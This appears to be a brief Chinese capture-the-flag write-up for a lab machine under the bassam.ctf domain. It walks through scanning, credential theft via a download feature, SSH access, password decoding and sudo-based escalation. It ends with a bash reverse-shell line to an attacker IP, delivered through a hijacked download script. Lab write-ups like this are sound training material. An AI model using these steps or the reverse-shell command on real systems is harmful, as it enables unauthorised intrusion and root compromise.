1.信息收集
探测存活主机,输入:netdiscover -r 192.168.239.0/24 ,发现192.168.239.177存活。
对目标主机192.168.239.176进行端口扫描,发现存活22(SSH)、80端口。
在浏览器上输入:http://192.168.239.177,查看源码,发现类似于网站的域名。
在/etc/hosts文件里面添加ip与对应的域名,浏览器访问域名,访问成果。
进行目录扫描,未发现可疑信息。
进行域名扫描,发现welcome.bassam.ctf,加入/etc/hosts中,访问http://welcome.bassam.ctf。
对http://welcome.bassam.ctf进行目录扫描,发现index.php与config.php。
访问index.php发现存在下载的功能。
2.漏洞利用
在url中输入:http://welcome.bassam.ctf/config.php,无反应;输入config.php下载成功,发现用户test:test123。
尝试ssh登录成功。
3.提权
在/home/kira中发现可执行文件test.sh,使用cat查看内容。
查看根目录,发现存在/PassProgram/文件夹,进入文件夹中,发现存在解码和编码。
查看/var/www/ctf,存在MySecretPassword可疑文件。
查看MySecretPassword文件类型为text,但无法查看。使用hexdump查看文件。猜测是用/PassProgram目录下的encoder加密的。
使用decoder解密,可得kira用户的密码为:kira2003。切换到kira用户。
输入sudo -l发现存在sudo提权。
切换到bassam用户。
查看bassam目录下存在down.sh文件,查看内容为下载script.sh文件。
将mywebsite.test域名添加到本机的hosts文件中
创建script.sh文件,在里面输入bash -i >& /dev/tcp/192.168.239.131/8888 0>&1,使用PHP开启web服务php -S 0:80。
开启本地监听,在另一个shell中输入sudo ./down.sh,反弹shell成功。
